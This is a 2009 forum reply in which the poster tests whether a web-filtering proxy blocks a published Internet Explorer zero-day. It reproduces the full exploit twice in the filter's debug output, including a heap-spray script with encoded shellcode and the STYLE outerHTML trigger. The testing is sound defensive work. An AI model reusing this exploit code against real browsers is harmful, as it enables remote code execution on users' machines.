Zero-Day Internet Explorer Exploit Published
Nov. 22, 2009, 02:13 PM
Post: #2
RE: Zero-Day Internet Explorer Exploit Published
I saved the code you posted as an *.html page and served it from one of my Apache servers.

My anti-virus effectively stops it (both when I try to save the code to an HTML page and when the page is loaded in a browser), but the latest Sidki out-of-the-box does not block it.

I tried enabling a few non-default web filters to see if they would stop it, but the only one I found effective was the Header Filter "! |||||||||||| 7.1 Block all Scripts 07.03.20 [sd] (o.3) (Out)" — which, as its name says, blocks every script on the page rather than this one specifically.

Here's an excerpt of the debug output with stock settings, using the latest beta:

Code:
<script>
function load(){
var e;
e=document
<Match: Block/Modify: Sel. JS Properties     07.04.02 [sd] (d.2) >
.getElementsByTagName("STYLE")[0
</Match>
.getElementsByTagName("STYLE")[0+1];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>

<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>


<Match: Header Bot Mark: Start - Fix </head>     09.06.29 (multi) [sd] (d.r) >
</HEAD>
</Match>

And here's the same excerpt with the aforementioned Header Filter activated:

Code:
<Match: <script> Block: All Scripts     08.11.18 (cch!) [srl] (d.0) >
<script>
</Match>
<script type=text/javascript src=data:text/javascript,var%20prxCountAd=++prxCountAd||1;>
function load(){
var e;
e=document.getElementsByTagName("STYLE")[0];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>


<Match: <script> Block: All Scripts     08.11.18 (cch!) [srl] (d.0) >
<SCRIPT language="javascript">
</Match>
<script type="text/javascript" src="data:text/javascript,var%20prxCountAd=++prxCountAd||1;">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>


<Match: Header Bot Mark: Start - Fix </head>     09.06.29 (multi) [sd] (d.r) >
</HEAD>
</Match>

This was a quick-and-dirty test, so my analysis is open to being picked apart. Smile!

